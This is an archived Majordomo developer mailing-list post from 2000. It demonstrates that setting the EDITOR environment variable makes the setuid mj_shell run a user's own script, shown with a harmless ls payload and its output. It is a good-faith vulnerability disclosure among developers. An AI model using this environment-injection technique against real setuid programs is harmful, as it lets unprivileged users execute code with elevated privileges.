Majordomo-Workers: demonstration: setuid wrappers are insecure?

Majordomo-Workers
(August 2000)

Indexed By Thread: [Previous] [Next]

Subject:	demonstration: setuid wrappers are insecure?
From:	SRE <eckert @ climber . org>
Date:	Mon, 28 Aug 2000 17:04:38 -0700
To:	majordomo-workers @ GreatCircle . COM, mj2-dev @ csf . colorado . edu
In-reply-to:	<ufak8d1v75x.fsf@epithumia.math.uh.edu>
References:	<Dave Hayes's message of "Mon, 28 Aug 2000 01:30:39 -0700"><200008280830.BAA26974@hokkshideh.jetcafe.org>

At 06:36 AM 8/28/00, Jason L Tibbitts III wrote:
>Then any setuid executable at all is vulnerable, and sanitizing the
>environment isn't going to help because you have exploited the linker, not
>our code.  This is the explanation I've received several times; please show
>me how it is wrong if it is wrong.

OK, I looked at setting the environment variable PERL5LIB to replace one
of the Majordomo modules, but Perl traps setuid scripts (and apparently
notices that it's a setuid wrapper running the Mj2 scripts) so that fails.

Then, after a minute or two, I thought of this non-malicious change:

% echo '/bin/ls -l /usr/local/majordomo/bin' > /home/usr/eckert/tryme
% chmod 777 /home/usr/eckert/tryme
% setenv EDITOR /home/usr/eckert/tryme
% /usr/local/majordomo/bin/mj_shell -p XXX configedit GLOBAL
total 196
-r-s--s--x  1 mdomo  lists   8808 Aug  9 21:35 mj_confirm
-r-s--s--x  1 mdomo  lists   8808 Aug  9 21:35 mj_email
-r-s--s--x  1 mdomo  lists   8808 Aug  9 21:35 mj_enqueue
-r-xr-xr-x  1 mdomo  lists  21945 Aug  9 18:40 mj_queuerun
-r-xr-xr-x  1 mdomo  lists   7610 Aug  9 18:40 mj_queueserv
-r-s--s--x  1 mdomo  lists   8808 Aug  9 21:35 mj_shell
-r-s--s--x  1 mdomo  lists   8808 Aug  9 21:35 mj_shutdown
-r-xr-xr-x  1 mdomo  lists   4133 Aug  9 18:40 mj_trigger
-r-s--s--x  1 mdomo  lists   8808 Aug  9 21:35 mj_wwwadm
-r-s--s--x  1 mdomo  lists   8808 Aug  9 21:35 mj_wwwusr
File unchanged; not executing.

Note that mj_shell is now executing my shell script instead of
running an editor. Oops, but no big deal. One can only guess
whether other things are possible, but given how easy this one
was to find and demonstrate, I'm guessing others will find others!

OK, so I got Mj2 to replace a command with my own shell script by
passing the hard path to the shell script as an environment variable.
I'm not saying THIS example is dangerous, but given one example of
an environment variable that replaces the configedit command with
a shell script I wrote as an unprivileged user, isn't it POSSIBLE
that there are worse exploits out there waiting?

I'm still not saying we need to change the wrappers, I'm just
responding to the request for a demonstration. I didn't exploit
the linker, the operating system, or the wrapper, I directly
exploited our (Mj2) perl code (Majordomo.pm). If you were to toss
the environment in the wrapper, this wouldn't be possible. Greater
minds than mine can debate whether that needs to be addressed.

SRE

mailto:eckert@climber.org | http://www.climber.org/eckert/
Info on peak climbing email lists mailto:info@climber.org

"A free society is one where it is safe to be unpopular."
   -- Adlai Stevenson

Follow-Ups:

Re: demonstration: setuid wrappers are insecure?
From: Jason L Tibbitts III <tibbs@math.uh.edu>

Indexed By Date	Previous:	Re: Fwd: Re: Fwd: Mj2 Installation From: SRE <eckert@climber.org>
Indexed By Date	Next:	Re: demonstration: setuid wrappers are insecure? From: Jason L Tibbitts III <tibbs@math.uh.edu>
Indexed By Thread	Previous:	PERL Module Installation via CPAN Output From: Craig Hartnett <subs@niner.net>
Indexed By Thread	Next:	Re: demonstration: setuid wrappers are insecure? From: Jason L Tibbitts III <tibbs@math.uh.edu>